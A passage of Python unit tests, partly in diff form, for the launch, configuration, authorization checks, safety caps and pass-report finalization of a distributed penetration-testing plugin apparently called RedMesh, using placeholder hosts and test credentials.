        d = config.to_dict()
        self.assertEqual(d["target"], "10.0.0.1")
        self.assertEqual(d["start_port"], 1)
        self.assertEqual(d["end_port"], 65535)
        self.assertEqual(d["run_mode"], "CONTINUOUS_MONITORING")

    def test_config_strip_none(self):
        """_strip_none removes None values from serialized config."""
        from extensions.business.cybersec.red_mesh.models import JobConfig

        # selected_peers=None must be dropped from the serialized form.
        config = JobConfig(
            target="example.com",
            start_port=1,
            end_port=100,
            exceptions=[],
            distribution_strategy="SLICE",
            port_order="SEQUENTIAL",
            nr_local_workers=2,
            enabled_features=[],
            excluded_features=[],
            run_mode="SINGLEPASS",
            selected_peers=None,
        )
        d = config.to_dict()
        self.assertNotIn("selected_peers", d)

    @classmethod
    def _mock_plugin_modules(cls):
        # Delegates to the shared conftest helper that stubs naeural_core.
        mock_plugin_modules()
r1fs_cid + plugin.chainstore_hset = MagicMock() + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_peers = ["node-1"] + plugin.cfg_chainstore_peers = ["node-1"] + plugin._redact_job_config = staticmethod(lambda d: d) + plugin._validate_feature_catalog = MagicMock() + return plugin + + @classmethod + def _bind_launch_helpers(cls, plugin): + """Bind real launch helper methods onto a MagicMock plugin host.""" + cls._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin._coerce_scan_type = lambda scan_type=None: PentesterApi01Plugin._coerce_scan_type(plugin, scan_type) + plugin._validation_error = lambda message: PentesterApi01Plugin._validation_error(plugin, message) + plugin._parse_exceptions = lambda exceptions: PentesterApi01Plugin._parse_exceptions(plugin, exceptions) + plugin._get_supported_features = lambda scan_type=None, categs=False: PentesterApi01Plugin._get_supported_features( + plugin, scan_type=scan_type, categs=categs + ) + plugin._get_all_features = lambda categs=False, scan_type=None: PentesterApi01Plugin._get_all_features( + plugin, categs=categs, scan_type=scan_type + ) + plugin._get_feature_catalog = lambda scan_type=None: PentesterApi01Plugin._get_feature_catalog(plugin, scan_type) + plugin._resolve_enabled_features = lambda excluded, scan_type="network": ( + PentesterApi01Plugin._resolve_enabled_features(plugin, excluded, scan_type=scan_type) + ) + plugin._resolve_active_peers = lambda selected: PentesterApi01Plugin._resolve_active_peers(plugin, selected) + plugin._normalize_common_launch_options = lambda **kwargs: PentesterApi01Plugin._normalize_common_launch_options( + plugin, **kwargs + ) + plugin._build_network_workers = lambda active_peers, start_port, end_port, distribution_strategy: ( + PentesterApi01Plugin._build_network_workers(plugin, active_peers, start_port, end_port, distribution_strategy) + ) + plugin._build_webapp_workers = lambda active_peers, 
target_port: ( + PentesterApi01Plugin._build_webapp_workers(plugin, active_peers, target_port) + ) + plugin._announce_launch = lambda **kwargs: PentesterApi01Plugin._announce_launch(plugin, **kwargs) + plugin.launch_network_scan = lambda **kwargs: PentesterApi01Plugin.launch_network_scan(plugin, **kwargs) + plugin.launch_webapp_scan = lambda **kwargs: PentesterApi01Plugin.launch_webapp_scan(plugin, **kwargs) + return plugin + + @classmethod + def _extract_job_specs(cls, plugin, job_id): + """Extract the job_specs dict from chainstore_hset calls.""" + for call in plugin.chainstore_hset.call_args_list: + kwargs = call[1] if call[1] else {} + if kwargs.get("key") == job_id: + return kwargs["value"] + return None + + def _launch(self, plugin, **kwargs): + """Call launch_test with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_test(plugin, **defaults) + + def _launch_network(self, plugin, **kwargs): + """Call launch_network_scan with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_network_scan(plugin, **defaults) + + def _launch_webapp(self, plugin, **kwargs): + """Call launch_webapp_scan with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict( + target_url="https://example.com/app", + official_username="admin", + official_password="secret", + 
authorized=True, + ) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_webapp_scan(plugin, **defaults) + + def test_launch_builds_job_config_and_stores_cid(self): + """launch_test() builds JobConfig, saves to R1FS, stores job_config_cid in CStore.""" + plugin = self._build_mock_plugin(job_id="test-job-1", r1fs_cid="QmFakeConfigCID123") + self._launch(plugin) + + # Verify r1fs.add_json was called with a JobConfig dict + self.assertTrue(plugin.r1fs.add_json.called) + config_dict = plugin.r1fs.add_json.call_args_list[0][0][0] + self.assertEqual(config_dict["target"], "example.com") + self.assertEqual(config_dict["start_port"], 1) + self.assertEqual(config_dict["end_port"], 1024) + self.assertIn("run_mode", config_dict) + + # Verify CStore has job_config_cid + job_specs = self._extract_job_specs(plugin, "test-job-1") + self.assertIsNotNone(job_specs, "Expected chainstore_hset call for job_specs") + self.assertEqual(job_specs["job_config_cid"], "QmFakeConfigCID123") + + def test_cstore_has_no_static_config(self): + """After launch, CStore object has no exceptions, distribution_strategy, etc.""" + plugin = self._build_mock_plugin(job_id="test-job-2") + self._launch(plugin) + + job_specs = self._extract_job_specs(plugin, "test-job-2") + self.assertIsNotNone(job_specs) + + # These static config fields must NOT be in CStore + removed_fields = [ + "exceptions", "distribution_strategy", "enabled_features", + "excluded_features", "scan_min_delay", "scan_max_delay", + "ics_safe_mode", "redact_credentials", "scanner_identity", + "scanner_user_agent", "nr_local_workers", "task_description", + "monitor_interval", "selected_peers", "created_by_name", + "created_by_id", "authorized", "port_order", + ] + for field in removed_fields: + self.assertNotIn(field, job_specs, f"CStore should not contain '{field}'") + + def test_cstore_has_listing_fields(self): + """CStore has target, task_name, start_port, end_port, date_created.""" + plugin = 
self._build_mock_plugin(job_id="test-job-3", time_val=1700000000.0) + self._launch(plugin, start_port=80, end_port=443, task_name="Web Scan") + + job_specs = self._extract_job_specs(plugin, "test-job-3") + self.assertIsNotNone(job_specs) + + self.assertEqual(job_specs["target"], "example.com") + self.assertEqual(job_specs["task_name"], "Web Scan") + self.assertEqual(job_specs["start_port"], 80) + self.assertEqual(job_specs["end_port"], 443) + self.assertEqual(job_specs["date_created"], 1700000000.0) + self.assertEqual(job_specs["risk_score"], 0) + + def test_pass_reports_initialized_empty(self): + """CStore has pass_reports: [] (no pass_history).""" + plugin = self._build_mock_plugin(job_id="test-job-4") + self._launch(plugin, start_port=1, end_port=100) + + job_specs = self._extract_job_specs(plugin, "test-job-4") + self.assertIsNotNone(job_specs) + + self.assertIn("pass_reports", job_specs) + self.assertEqual(job_specs["pass_reports"], []) + self.assertNotIn("pass_history", job_specs) + + def test_launch_fails_if_r1fs_unavailable(self): + """If R1FS fails to store config, launch aborts with error.""" + plugin = self._build_mock_plugin(job_id="test-job-5", r1fs_cid=None) + result = self._launch(plugin, start_port=1, end_port=100) + + self.assertIn("error", result) + # CStore should NOT have been written with the job + job_specs = self._extract_job_specs(plugin, "test-job-5") + self.assertIsNone(job_specs) + + def test_launch_webapp_scan_uses_mirrored_worker_assignments(self): + """Webapp launches assign the same resolved target port to every selected peer.""" + plugin = self._build_mock_plugin(job_id="test-job-webapp") + plugin.chainstore_peers = ["node-1", "node-2"] + plugin.cfg_chainstore_peers = ["node-1", "node-2"] + + result = self._launch_webapp(plugin, selected_peers=["node-1", "node-2"]) + self.assertNotIn("error", result) + + job_specs = self._extract_job_specs(plugin, "test-job-webapp") + workers = job_specs["workers"] + 
self.assertEqual(workers["node-1"]["start_port"], 443) + self.assertEqual(workers["node-1"]["end_port"], 443) + self.assertEqual(workers["node-2"]["start_port"], 443) + self.assertEqual(workers["node-2"]["end_port"], 443) + + def test_launch_webapp_scan_neutralizes_network_only_fields(self): + """Webapp config does not persist bogus network defaults like exceptions='64297'.""" + plugin = self._build_mock_plugin(job_id="test-job-webcfg") + self._launch_webapp(plugin) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["scan_type"], "webapp") + self.assertEqual(config_dict["exceptions"], []) + self.assertEqual(config_dict["distribution_strategy"], "MIRROR") + self.assertEqual(config_dict["nr_local_workers"], 1) + self.assertEqual(config_dict["target_url"], "https://example.com/app") + + def test_launch_webapp_scan_persists_secret_ref_not_inline_passwords(self): + """Webapp launch stores a separate secret blob and persists only secret_ref in JobConfig.""" + plugin = self._build_mock_plugin(job_id="test-job-websecret") + plugin.r1fs.add_json.side_effect = ["QmSecretCID", "QmConfigCID"] + + result = self._launch_webapp( + plugin, + official_username="admin", + official_password="secret", + regular_username="user", + regular_password="pass", + weak_candidates=["admin:admin"], + ) + + self.assertNotIn("error", result) + self.assertEqual(len(plugin.r1fs.add_json.call_args_list), 2) + + secret_doc = plugin.r1fs.add_json.call_args_list[0][0][0] + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + secret_kwargs = plugin.r1fs.add_json.call_args_list[0][1] + + self.assertEqual(secret_doc["kind"], "redmesh_graybox_credentials") + self.assertEqual(secret_doc["storage_mode"], "encrypted_r1fs_json_v1") + self.assertEqual(secret_doc["payload"]["official_password"], "secret") + self.assertEqual(secret_doc["payload"]["regular_password"], "pass") + self.assertEqual(secret_doc["payload"]["weak_candidates"], ["admin:admin"]) + 
self.assertEqual(secret_kwargs["secret"], "unit-test-redmesh-secret-key") + + self.assertEqual(config_dict["secret_ref"], "QmSecretCID") + self.assertEqual(config_dict["official_username"], "") + self.assertEqual(config_dict["official_password"], "") + self.assertEqual(config_dict["regular_username"], "") + self.assertEqual(config_dict["regular_password"], "") + self.assertNotIn("weak_candidates", config_dict) + self.assertTrue(config_dict["has_regular_credentials"]) + self.assertTrue(config_dict["has_weak_candidates"]) + + job_specs = self._extract_job_specs(plugin, "test-job-websecret") + self.assertEqual(job_specs["job_config_cid"], "QmConfigCID") + + def test_launch_webapp_scan_rejects_secret_persistence_without_store_key(self): + """Webapp launch fails closed when no strong secret-store key is configured.""" + plugin = self._build_mock_plugin(job_id="test-job-websecret-nokey") + plugin.cfg_redmesh_secret_store_key = "" + plugin.cfg_comms_host_key = "" + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 86400, "RETRIES": 2} + + result = self._launch_webapp( + plugin, + official_username="admin", + official_password="secret", + ) + + self.assertEqual(result["error"], "Failed to store job config in R1FS") + self.assertEqual(len(plugin.r1fs.add_json.call_args_list), 0) + + def test_launch_webapp_scan_rejects_missing_target_url(self): + """Webapp endpoint returns structured validation error for missing URL.""" + plugin = self._build_mock_plugin(job_id="test-job-weberr") + result = self._launch_webapp(plugin, target_url="") + self.assertEqual(result["error"], "validation_error") + self.assertIn("target_url", result["message"]) + + def test_launch_webapp_scan_rejects_invalid_url_scheme(self): + """Webapp endpoint rejects malformed or non-http(s) targets.""" + plugin = self._build_mock_plugin(job_id="test-job-webbadurl") + result = self._launch_webapp(plugin, target_url="ftp://example.com/app") + 
self.assertEqual(result["error"], "validation_error") + self.assertIn("http/https", result["message"]) + + def test_launch_network_scan_requires_authorization_with_structured_error(self): + """Network endpoint returns validation_error when authorization is missing.""" + plugin = self._build_mock_plugin(job_id="test-job-noauth") + result = self._launch_network(plugin, authorized=False) + self.assertEqual(result["error"], "validation_error") + self.assertIn("authorization", result["message"].lower()) + + def test_launch_network_scan_rejects_target_confirmation_mismatch(self): + """Target confirmation must echo the resolved target host.""" + plugin = self._build_mock_plugin(job_id="test-job-confirm") + result = self._launch_network(plugin, target="example.com", target_confirmation="other.example.com", authorized=True) + self.assertEqual(result["error"], "validation_error") + self.assertIn("target_confirmation", result["message"]) + + def test_launch_webapp_scan_enforces_target_allowlist(self): + """Webapp targets outside the allowlist are rejected before launch.""" + plugin = self._build_mock_plugin(job_id="test-job-allowlist") + result = self._launch_webapp( + plugin, + target_url="https://example.com/app", + target_allowlist=["internal.example.org"], + ) + self.assertEqual(result["error"], "validation_error") + self.assertIn("allowlist", result["message"]) + + def test_launch_webapp_scan_persists_authorization_context(self): + """Authorization metadata is stored in immutable job config and audit context.""" + plugin = self._build_mock_plugin(job_id="test-job-authctx") + plugin._log_audit_event = MagicMock() + + self._launch_webapp( + plugin, + target_confirmation="example.com", + scope_id="scope-123", + authorization_ref="TICKET-42", + engagement_metadata={"ticket": "TICKET-42", "owner": "alice"}, + target_allowlist=["example.com", "/api/"], + target_config={"discovery": {"scope_prefix": "/api/"}}, + ) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + 
self.assertEqual(config_dict["target_confirmation"], "example.com") + self.assertEqual(config_dict["scope_id"], "scope-123") + self.assertEqual(config_dict["authorization_ref"], "TICKET-42") + self.assertEqual(config_dict["engagement_metadata"]["owner"], "alice") + self.assertEqual(config_dict["target_allowlist"], ["example.com", "/api/"]) + audit_payload = plugin._log_audit_event.call_args[0][1] + self.assertEqual(audit_payload["scope_id"], "scope-123") + self.assertEqual(audit_payload["authorization_ref"], "TICKET-42") + + def test_launch_webapp_scan_applies_safety_policy_caps(self): + """Graybox launch policy caps weak-auth and discovery budgets and records warnings.""" + plugin = self._build_mock_plugin(job_id="test-job-policy") + plugin.cfg_graybox_budgets = { + "AUTH_ATTEMPTS": 3, + "ROUTE_DISCOVERY": 20, + "STATEFUL_ACTIONS": 0, + } + + self._launch_webapp( + plugin, + max_weak_attempts=9, + allow_stateful_probes=True, + verify_tls=False, + target_config={"discovery": {"scope_prefix": "/api/", "max_pages": 50}}, + ) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["max_weak_attempts"], 3) + self.assertEqual(config_dict["target_config"]["discovery"]["max_pages"], 20) + self.assertFalse(config_dict["allow_stateful_probes"]) + warnings = config_dict["safety_policy"]["warnings"] + self.assertTrue(any("capped" in warning for warning in warnings)) + self.assertTrue(any("TLS verification is disabled" in warning for warning in warnings)) + + def test_launch_test_rejects_invalid_scan_type(self): + """Compatibility endpoint rejects unknown scan types with a structured error.""" + plugin = self._build_mock_plugin(job_id="test-job-badtype") + result = self._launch(plugin, scan_type="invalid-scan-type") + self.assertEqual(result["error"], "validation_error") + self.assertIn("Invalid scan_type", result["message"]) + + def test_launch_test_routes_to_scan_type_specific_endpoint(self): + """Compatibility launch_test routes to 
network/webapp launch methods.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.launch_network_scan = MagicMock(return_value={"route": "network"}) + plugin.launch_webapp_scan = MagicMock(return_value={"route": "webapp"}) + + network = PentesterApi01Plugin.launch_test(plugin, target="example.com", authorized=True, scan_type="network") + webapp = PentesterApi01Plugin.launch_test( + plugin, + target="example.com", + target_url="https://example.com/app", + official_username="admin", + official_password="secret", + authorized=True, + scan_type="webapp", + ) + + self.assertEqual(network["route"], "network") + self.assertEqual(webapp["route"], "webapp") + plugin.launch_network_scan.assert_called_once() + plugin.launch_webapp_scan.assert_called_once() + + def test_launch_webapp_scan_persists_graybox_enabled_features_only(self): + """Webapp launches resolve enabled features from the graybox capability set only.""" + plugin = self._build_mock_plugin(job_id="test-job-webfeatures") + self._launch_webapp(plugin, excluded_features=["_graybox_injection"]) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["excluded_features"], ["_graybox_injection"]) + self.assertIn("_graybox_access_control", config_dict["enabled_features"]) + self.assertIn("_graybox_weak_auth", config_dict["enabled_features"]) + self.assertNotIn("_graybox_injection", config_dict["enabled_features"]) + self.assertFalse(any(method.startswith("_service_info_") for method in config_dict["enabled_features"])) + self.assertFalse(any(method.startswith("_web_test_") for method in config_dict["enabled_features"])) + + +class TestPhase4FeatureCatalog(unittest.TestCase): + """Phase 4: feature catalog and scan-type capability modeling.""" + + @classmethod + def _mock_plugin_modules(cls): + mock_plugin_modules() + + def _build_plugin(self): + plugin = MagicMock() + 
plugin.json_dumps = staticmethod(json.dumps) + plugin.P = MagicMock() + return TestPhase1ConfigCID._bind_launch_helpers(plugin) + + def test_get_all_features_filters_by_scan_type(self): + """Capability discovery is scan-type-aware.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + network = PentesterApi01Plugin._get_all_features(plugin, scan_type="network") + webapp = PentesterApi01Plugin._get_all_features(plugin, scan_type="webapp") + merged = PentesterApi01Plugin._get_all_features(plugin) + + self.assertIn("_service_info_http", network) + self.assertIn("_post_scan_correlate", network) + self.assertNotIn("_graybox_access_control", network) + self.assertIn("_graybox_access_control", webapp) + self.assertNotIn("_service_info_http", webapp) + self.assertIn("_graybox_access_control", merged) + self.assertIn("_service_info_http", merged) + + def test_get_feature_catalog_filters_graybox_category(self): + """Catalog filtering returns only graybox entries for webapp scans.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + response = PentesterApi01Plugin.get_feature_catalog(plugin, scan_type="webapp") + + self.assertEqual([item["category"] for item in response["catalog"]], ["graybox"]) + self.assertIn("_graybox_access_control", response["all_methods"]) + self.assertNotIn("_service_info_http", response["all_methods"]) + + def test_validate_feature_catalog_rejects_missing_worker_methods(self): + """Startup validation fails loudly when catalog methods are not executable.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + bad_catalog = [ + { + "id": "graybox", + "label": "Graybox", + "description": "Broken", + "category": "graybox", + "methods": 
["_graybox_missing_method"], + } + ] + + with patch( + "extensions.business.cybersec.red_mesh.pentester_api_01.FEATURE_CATALOG", + bad_catalog, + ): + with self.assertRaises(RuntimeError): + PentesterApi01Plugin._validate_feature_catalog(plugin) + + def test_network_features_come_from_explicit_registry(self): + """Network feature discovery stays tied to the explicit registry order.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.worker.pentest_worker import PentestLocalWorker + from extensions.business.cybersec.red_mesh.constants import NETWORK_FEATURE_METHODS, NETWORK_FEATURE_REGISTRY + + self.assertEqual(PentestLocalWorker.get_supported_features(), list(NETWORK_FEATURE_METHODS)) + self.assertEqual(PentestLocalWorker.get_supported_features(categs=True), { + category: list(methods) + for category, methods in NETWORK_FEATURE_REGISTRY.items() + }) + + + +class TestPhase2PassFinalization(unittest.TestCase): + """Phase 2: Single Aggregation + Consolidated Pass Reports.""" + + @classmethod + def _mock_plugin_modules(cls): + """Install mock modules so pentester_api_01 can be imported without naeural_core.""" + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_finalize_plugin(self, job_id="test-job", job_pass=1, run_mode="SINGLEPASS", + llm_enabled=False, r1fs_returns=None): + """Build a mock plugin pre-configured for _maybe_finalize_pass testing.""" + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.cfg_llm_agent = { + "ENABLED": llm_enabled, + "TIMEOUT": 30, + "AUTO_ANALYSIS_TYPE": "security_assessment", + } + plugin.cfg_llm_agent_api_host = "localhost" + plugin.cfg_llm_agent_api_port = 8080 + 
plugin.cfg_monitor_interval = 60 + plugin.cfg_monitor_jitter = 0 + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 300, "RETRIES": 2} + plugin.time.return_value = 1000100.0 + plugin.json_dumps.return_value = "{}" + + # R1FS mock + plugin.r1fs = MagicMock() + cid_counter = {"n": 0} + def fake_add_json(data, show_logs=True): + cid_counter["n"] += 1 + if r1fs_returns is not None: + return r1fs_returns.get(cid_counter["n"], f"QmCID{cid_counter['n']}") + return f"QmCID{cid_counter['n']}" + plugin.r1fs.add_json.side_effect = fake_add_json + + # Job config in R1FS + plugin.r1fs.get_json.return_value = { + "target": "example.com", "start_port": 1, "end_port": 1024, + "run_mode": run_mode, "enabled_features": [], "monitor_interval": 60, + } + + # Build job_specs with two finished workers + job_specs = { + "job_id": job_id, + "job_status": "RUNNING", + "job_pass": job_pass, + "run_mode": run_mode, + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 0, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, + "worker-B": {"start_port": 513, "end_port": 1024, "finished": True, "report_cid": "QmReportB"}, + }, + "timeline": [{"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}], + "pass_reports": [], + } + + plugin.chainstore_hgetall.return_value = {job_id: job_specs} + plugin.chainstore_hset = MagicMock() + + Plugin = self._get_plugin_class() + plugin._count_nested_findings = lambda section: Plugin._count_nested_findings(section) + plugin._count_all_findings = lambda report: Plugin._count_all_findings(plugin, report) + + return plugin, job_specs + + def _sample_node_report( + self, + start_port=1, + end_port=512, + 
open_ports=None, + findings=None, + graybox_findings=None, + web_findings=None, + correlation_findings=None, + ): + """Build a sample node report dict.""" + report = { + "start_port": start_port, + "end_port": end_port, + "open_ports": open_ports or [80, 443], + "ports_scanned": end_port - start_port + 1, + "nr_open_ports": len(open_ports or [80, 443]), + "service_info": {}, + "web_tests_info": {}, + "completed_tests": ["port_scan"], + "port_protocols": {"80": "http", "443": "https"}, + "port_banners": {}, + "correlation_findings": correlation_findings or [], + "graybox_results": {}, + } + if findings: + # Add findings under service_info for port 80 + report["service_info"] = { + "80": { + "_service_info_http": { + "findings": findings, + } + } + } + if web_findings: + report["web_tests_info"] = { + "80": { + "_web_test_xss": { + "findings": web_findings, + } + } + } + if graybox_findings: + report["graybox_results"] = { + "443": { + "_graybox_test": { + "findings": graybox_findings, + } + } + } + return report + + def test_single_aggregation(self): + """_collect_node_reports called exactly once per pass finalization.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + # Mock _collect_node_reports and _get_aggregated_report + report_a = self._sample_node_report(1, 512, [80]) + report_b = self._sample_node_report(513, 1024, [443]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a, "worker-B": report_b}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, + "completed_tests": ["port_scan"], "ports_scanned": 1024, + "nr_open_ports": 2, "port_protocols": {"80": "http", "443": "https"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + 
plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # _collect_node_reports called exactly once + plugin._collect_node_reports.assert_called_once() + + def test_pass_report_cid_in_r1fs(self): + """PassReport stored in R1FS with correct fields.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # r1fs.add_json called twice: once for aggregated data, once for PassReport + self.assertEqual(plugin.r1fs.add_json.call_count, 2) + + # Second call is the PassReport + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(pass_report_dict["pass_nr"], 1) + self.assertIn("aggregated_report_cid", pass_report_dict) + self.assertIn("worker_reports", pass_report_dict) + self.assertEqual(pass_report_dict["risk_score"], 10) + 
self.assertIn("risk_breakdown", pass_report_dict) + self.assertIn("date_started", pass_report_dict) + self.assertIn("date_completed", pass_report_dict) + + def test_pass_report_worker_meta_counts_graybox_findings(self): + """WorkerReportMeta.nr_findings includes graybox findings.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin() + + report_a = self._sample_node_report( + 1, + 512, + [443], + findings=[{"title": "svc"}], + web_findings=[{"title": "web"}], + graybox_findings=[ + {"scenario_id": "S1", "status": "vulnerable"}, + {"scenario_id": "S2", "status": "not_vulnerable"}, + ], + correlation_findings=[{"title": "corr"}], + ) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [443], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"443": "https"}, "graybox_results": report_a["graybox_results"], + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "scan_type": "webapp"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(pass_report_dict["worker_reports"]["worker-A"]["nr_findings"], 5) + + def test_aggregated_report_separate_cid(self): + """aggregated_report_cid is a separate R1FS write from the PassReport.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: 
"QmAggCID", 2: "QmPassCID"}) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # First R1FS write = aggregated data, second = PassReport + agg_dict = plugin.r1fs.add_json.call_args_list[0][0][0] + pass_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + + # The PassReport references the aggregated CID + self.assertEqual(pass_dict["aggregated_report_cid"], "QmAggCID") + + # Aggregated data should have open_ports (from AggregatedScanData) + self.assertIn("open_ports", agg_dict) + + def test_continuous_pass_returns_job_status_to_running(self): + """Continuous monitoring jobs re-enter RUNNING after pass finalization.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin(run_mode="CONTINUOUS_MONITORING") + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = 
MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._get_timeline_date = MagicMock(return_value=1000000.0) + plugin._emit_timeline_event = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + self.assertEqual(job_specs["job_status"], "RUNNING") + self.assertIsNotNone(job_specs.get("next_pass_at")) + + def test_continuous_pass_cap_stops_and_archives_job(self): + """Continuous jobs stop and archive instead of scheduling pass 101.""" + PentesterApi01Plugin = self._get_plugin_class() + plugin, job_specs = self._build_finalize_plugin( + run_mode="CONTINUOUS_MONITORING", + job_pass=MAX_CONTINUOUS_PASSES, + ) + + report_a = self._sample_node_report(1, 512, [80]) + plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, + "port_protocols": {"80": "http"}, + }) + plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) + plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) 